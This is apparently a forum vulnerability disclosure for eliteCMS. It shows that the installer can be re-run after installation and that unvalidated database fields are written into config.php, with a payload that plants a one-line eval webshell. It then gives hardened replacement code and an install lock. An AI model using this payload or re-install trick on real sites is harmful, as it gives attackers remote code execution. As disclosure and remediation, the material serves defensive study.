eliteCMS installer not locked after install + one-line webshell write vulnerability

OP, posted 2012-11-18 13:59:27
eliteCMS's installer is not locked after installation finishes, so an attacker can re-run the installation simply by visiting the installer URL.

The other vulnerability is that the installer can write a one-line webshell straight into admin/includes/config.php.
Let's look at the code:

...
elseif ($_GET['step'] == "4") {
    // step 4 of the installer: generate admin/includes/config.php as a PHP source string
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
...(omitted)...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    // the $_SESSION values are interpolated verbatim into the generated source
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "        die(\"Database connection failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "        die(\"Database select failed\" .mysql_error());\n";
    $write .= "        \n";
    $write .= "} \n";
    $write .= "?>\n";

    // the string is written to the config file as-is
    $writer = fopen($file, 'w');
...

Now look at this code:

$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];

The values are taken without any validation.
If the database name is POSTed as:

"?><?php eval($_POST[c]);?><?php

a one-line backdoor is written to /admin/includes/config.php.
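Added example (my own code, not eliteCMS's): the same config-generation pattern next to a hardened version that whitelists each field and emits it with var_export(), plus an install lock so the installer cannot be re-run. The function names, the install.lock path and the sample input are hypothetical.

```php
<?php
// Added example, not eliteCMS code. Function names and paths are hypothetical.

// Reproduces the vulnerable pattern: each value is interpolated straight into
// PHP source, so a quote or a closing tag inside it becomes program text.
function build_config_vulnerable(array $in): string {
    $src = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $k) {
        $src .= "define(\"$k\", \"{$in[$k]}\");\n";
    }
    return $src;
}

// Hardened: validate every field against a strict pattern first, then emit it
// with var_export(), which yields a single-quoted literal with ' and \ escaped.
// A closing tag inside a single-quoted PHP string stays data, so DB_PASS may
// contain any printable ASCII and still cannot break out of the literal.
function build_config_safe(array $in): string {
    $rules = [
        'DB_SERVER' => '/\A[A-Za-z0-9.\-]+(:[0-9]{1,5})?\z/', // host[:port]
        'DB_NAME'   => '/\A[A-Za-z0-9_]{1,64}\z/',            // MySQL identifier
        'DB_USER'   => '/\A[A-Za-z0-9_.\-]{1,32}\z/',
        'DB_PASS'   => '/\A[\x20-\x7e]{0,128}\z/',            // printable ASCII
    ];
    $src = "<?php\n";
    foreach ($rules as $k => $re) {
        $v = (string)($in[$k] ?? '');
        if (preg_match($re, $v) !== 1) {
            throw new InvalidArgumentException("$k: value rejected");
        }
        $src .= "define('$k', " . var_export($v, true) . ");\n";
    }
    return $src;
}

// Install lock (hypothetical path): refuse to run once install.lock exists.
function installer_locked(string $dir): bool {
    return file_exists($dir . '/install.lock');
}

// Create the lock with mode 'x', which fails if the file already exists, so
// two concurrent installer requests cannot both succeed.
function lock_installer(string $dir): void {
    $h = @fopen($dir . '/install.lock', 'x');
    if ($h === false) {
        throw new RuntimeException('installer already locked');
    }
    fwrite($h, date('c') . "\n");
    fclose($h);
}

// Constructed input: the payload shape from the post, placed in DB_NAME.
$input = [
    'DB_SERVER' => 'localhost',
    'DB_NAME'   => '"?><?php eval($_POST[c]);?><?php',
    'DB_USER'   => 'elite',
    'DB_PASS'   => 's3cret',
];

// Vulnerable generator: the quote and the PHP tags land verbatim in the source.
echo build_config_vulnerable($input);

// Hardened generator: the same input is rejected before anything is written.
try {
    echo build_config_safe($input);
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}

// With sane values the hardened generator emits properly quoted literals,
// including a password that contains a quote and a backslash.
$input['DB_NAME'] = 'elite_cms';
$input['DB_PASS'] = "it's \\ tricky";
echo build_config_safe($input);
```

In the first output the DB_NAME line reads `define("DB_NAME", ""?><?php eval($_POST[c]);?><?php");`, which shows why interpolating into source is unsafe regardless of what the rest of the file looks like. To close the re-install hole, call installer_locked() at the top of the install script and exit if it returns true, and call lock_installer() right after the step that writes config.php; the 'x' open mode means a second request racing the first gets an exception instead of a second write.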